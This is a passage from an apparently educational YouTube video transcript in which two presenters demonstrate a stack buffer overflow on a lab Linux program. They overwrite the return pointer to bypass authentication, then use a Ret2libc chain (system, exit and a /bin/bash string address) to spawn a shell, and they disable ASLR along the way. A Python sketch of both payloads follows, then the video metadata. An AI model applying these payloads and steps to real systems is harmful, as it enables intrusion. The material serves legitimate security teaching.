take my input here, so instead of EEEE, in little endian format, because x86 is a little endian architecture, which means it writes the bytes in reverse order in memory, so we have to write the address in backwards so that it actually ends up in the right order. So \x36\x62, and by the way, the \x means base 16, hexadecimal, \x55\x56. So I've now written that address that I have highlighted in little endian format. That will overwrite this position here where it says return pointer, and if it works it will return to the granted function call, bypassing authentication. So let's see what happens here. I'm going to let it go, and it says stopped, checkpw, segfault, but we're in the checkpw function, so if I go up top here, look at that: access granted. So we successfully bypassed authentication. Now, we could have overwritten that with a call to a function or something like that. That's one cool technique to get around ASLR, I mean data execution prevention. There's a technique called Ret2libc, it's an older technique but it works quite well, where if inside the debugger we say print, let's see here, how about we print system. What this is showing us is the address of the system function. So if I can return to the system function, I might be able to pass it something like an environment variable, to pop a shell, like /bin/sh, something like that. There might be some cool opportunities there. So we have a lot of options, which is nice. Well, one thing I just noticed here is, I don't know why this shell environment variable is in there, but this says SHELL=/bin/bash. So if we return to system and pass it the address of /bin/bash as the argument, it might pop a shell, which would be interesting. Let me see if I can print that string out in memory, though. So I'm going to say x/s, that says examine as a string, and then I'm going to give it a memory address, so 0xffffd098. So that's showing us not 
what I was hoping to see. Let's try this address here though, so x/s, examine as a string, 0xffffd337. So SHELL=/bin/bash, so we need to go a little forward here. How about 3a? How about 3c? 3d. So /bin/bash is at this memory address. So if we overwrite the return pointer with the address of system and pass it this address as an argument, it might pop a shell, it might not, but we're going to try it, because why not. So let's overwrite the return pointer with the address of system, which I'll highlight real quick, it's that guy, so \xa0\x05\xe2\xf7, and then a four-byte pad, and then finally the address of the shell string. So why have a four-byte pad? Because I know someone's going to ask. We are returning to the system function. That is not how you call a function, you don't return to it, you call it. Remember, the first thing that a call instruction does is push the return pointer onto the stack. So this pad that I'm putting there is literally where system will return to when it gets done executing my command. It's expecting the return pointer to be at that position in memory, so we're just putting a pad there. It'll crash, but hopefully it'll pop my shell first. So let's see if we can make that work. I'm going to put in this address now, which is the address of the /bin/bash string, so \x3d\xd3\xff\xff, and then let's cross our fingers. A seg fault. I don't know if I got a shell or not. Oh yeah, we did, look, see that: detaching after vfork from child process. So it did pop a shell, it just didn't follow the fork. So that's pretty cool, it did actually pop the shell, but here's the thing: it still crashed though, didn't it? Let's fix that so it doesn't crash and it exits gracefully. Print the address of the exit function. So instead of the pad I'm going to put the address of the exit function in there, so when it returns it exits cleanly and it doesn't put a log entry in, you know, that we would see with dmesg. So now I'm going to put this address in, and we'll say 
\x90\x36\xe1\xf7. Now when I run it I'm hoping it doesn't crash. It still says, no, it did crash anyway. I wonder why it did that, it's reporting a SIGTRAP. It still did the fork, but for whatever reason, I think it's because we're in a debugger, but normally that would let us exit out cleanly. So you would have popped a shell and then you would have basically got access, right? Yeah, yeah, totally, it's just not following the fork. I'll try it outside the debugger real quickly, but ASLR is on, so I don't know if it's gonna work, but it's okay, we'll give it a shot. Let's copy this. Why isn't it, let me copy that, maybe it did. All right, so what I just looked at there is randomize_va_space, that's the setting for ASLR. I'm going to try and turn that off right now, since we're not going through a, you know, defeating ASLR session right now. That's jumping ahead, I think. For everyone who's watching, let us know in the comments the kind of stuff that you want to see. Stephen's got so much knowledge, and I mean this is just the beginning, so let us know the kind of stuff that you want to see. echo 0, /proc/sys/kernel. That's the crazy thing, you can turn off ASLR so easily on a Linux box; on Windows you can't do that. All right, so now let's try to run the exploit again. I don't think it's going to be happy. All right, so here's something interesting. We try to run this outside of the debugger, and notice it's saying not found, saying that this crazy thing here is not found. What's happening is it's actually working, so system is actually trying to execute our command, and that's why the shell is printing out this crazy stuff, but the memory layout outside the debugger is different than inside the debugger. So I'm going to try one last thing to see if I can get this to work. I'm gonna create an environment variable now, and let's see if we can find it. So export, and then we're going to call it 
SYS equals, that's the name of my environment variable, and I want it to simply say /bin/bash, and if I can find that environment variable in memory then it will execute that. Let me see if I can find it here. So that's the problem now, I need to find that environment variable, which can be really, really tricky. I'm going to look around a little bit. So see how, um, ln: missing file operand, we're getting weird things sent back to us. That's because we're sneaking around in memory. I'm typing different addresses trying to find the string /bin/bash, so sometimes we get a weird message because we are passing a string to system that it doesn't understand, it's like, what is that? So, for everyone watching, Stephen and I have spent quite a bit of time now trying to manually find the part of memory. Stephen, you can explain it better than I can, but you're missing a piece of software that would allow you to find it, and then when we tried to run bash it wasn't allowing us to do it, right? 
Yeah, for sure. Unfortunately there's this little program I wrote, it doesn't do anything fancy, but basically if you create an environment variable it will tell you the address where that environment variable will be located. So the first thing we saw was, when the process crashes, we saw this SHELL=/bin/bash that was for some reason mapped into the environment, so when I ran it in the debugger, as you saw, we got a shell and it worked, it just didn't follow the fork, but we got a shell. Perfect, awesome. I wanted to get it working outside the debugger real quick, so I was like, maybe I can find this /bin/bash outside the debugger. So we started looking at these environment variables all around here, and by messing around with the memory address we were able to find out exactly where we were. We printed out truecolor, we printed out session manager, and we should have been right here, and we were able to get to some stuff behind that address, but for whatever reason it wasn't actually mapping that specific shell environment variable into memory at that spot, even though we found the right address, and we don't know if that's maybe a protection or if it's not there for some other reason. To get around this you typically can simply create an environment variable yourself and then find the address of that variable and pass it as an argument. And this was just one of the techniques that we were looking at, called Ret2libc, in which you overwrite the return pointer with the address of a function that's loaded into memory, and you can pass any argument you want to that function, and you get around data execution prevention because the code you're executing is really in the code segment. We're searching through memory here. We just couldn't help ourselves but look around a bit more. We were able to find the =/bin/bash part of the environment variable, and for whatever reason when we go forward one more byte to 35, which should 
actually be /bin/bash, it's not popping a shell. We go forward a couple more bytes, like 37, you can see in/bash, but for whatever reason it's not popping one, and it probably has to do with, like, the permissions not being set properly, or some other protection might be running on this box that I'm not compensating for. But we actually had it working perfectly right here. In the debugger it worked; outside of the debugger it's not, so that leads me to believe that there is another, like, DEP component preventing this from being possible, but a lot of times this works perfectly. So Stephen, the question is always, how do I learn more? You have a bunch of this stuff on your channel, right, and a whole bunch of other things. Yeah, absolutely. So on my channel I tend to weave in and out of exploit development topics, and then we'll go to cloud hacking, and then we'll go to crypto, and just kind of all over the place, because I think it's really fun to have guests on to talk about different areas where they're an expert. What I typically tend to do is, like recently I went through and did some kernel debugging and reverse engineered different exploit mitigations so that we could understand how these mitigations work at a very low level. So I tend to be in the more advanced spaces, but if there's a topic you'd love to see I'm happy to do it on that channel, or also here with David of course. But yeah, my Off By One Security channel on YouTube, I try as many Fridays as possible at 11 A.M. Pacific time. So, everyone watching, please go and show your love, go and subscribe to Stephen's channel. Stephen, thanks so much for sharing your knowledge. I know you've been in this game a long time and you have a crazy amount of knowledge, so thanks for, you know, making it freely available on YouTube, really appreciate it. [Music]
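For reference, the two payloads built during the walkthrough can be sketched in Python roughly as follows. This is a hedged sketch, not the exact commands from the video: the addresses are the ones read out for that particular VM and debugger session (the captions garble some digits, so treat every address as a placeholder), the 112-byte offset assumes the `ebp-0x6c` buffer distance plus a 4-byte saved base pointer, and `p32`, `ret_to_granted` and `ret2libc` are hypothetical helper names.

```python
import struct

# Buffer-to-ebp distance (0x6c) plus the 4-byte saved base pointer.
OFFSET_TO_RET = 0x6C + 4

# Placeholder addresses as heard in the video; they differ on other systems.
GRANTED_CALL = 0x56556236  # call to granted() inside checkpw
SYSTEM_ADDR = 0xF7E205A0   # libc system()
EXIT_ADDR = 0xF7E13690     # libc exit()
BIN_BASH_STR = 0xFFFFD33D  # "/bin/bash" inside the SHELL= environment string


def p32(address: int) -> bytes:
    """Pack a 32-bit address in little-endian byte order, as x86 stores it."""
    return struct.pack("<I", address)


def ret_to_granted() -> bytes:
    """Filler up to the return pointer, then the address of the granted call."""
    return b"A" * OFFSET_TO_RET + p32(GRANTED_CALL)


def ret2libc(return_after_system: int = EXIT_ADDR) -> bytes:
    """Filler, system(), the address system() returns to, then its argument.

    The middle word is the four-byte pad from the walkthrough; using the
    address of exit() there is what lets the process exit cleanly.
    """
    return (
        b"A" * OFFSET_TO_RET
        + p32(SYSTEM_ADDR)
        + p32(return_after_system)
        + p32(BIN_BASH_STR)
    )


print(ret_to_granted()[-4:].hex())  # 36625556
print(len(ret2libc()))              # 124
```

When feeding such a payload to a program from Python 3, writing it with `sys.stdout.buffer.write(...)` keeps the raw bytes intact, whereas `print` on a text string would encode the non-ASCII bytes.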
Info
Channel: David Bombal
Views: 56,668
Keywords: buffer, buffer overflow, buffer overflow attack, hacking, cracking, attacks, exploit, buffer exploit, buffer underflow, buffer overrun, computer security, Data Buffer, Exploit, exploit development, windows, linux, exploits, zero day, ubuntu, kali, kali linux, windows 11, windows 10, cyber, cybersecurity, hack, hacker, malware, infosec, information security, cyber security, ethical hacking, real world hack, hacking course, cybersecurity course, oscp, buffer overflow exploit, 0day
Id: c2BvS2VqDWg
Length: 55min 39sec (3339 seconds)
Published: Sun Aug 13 2023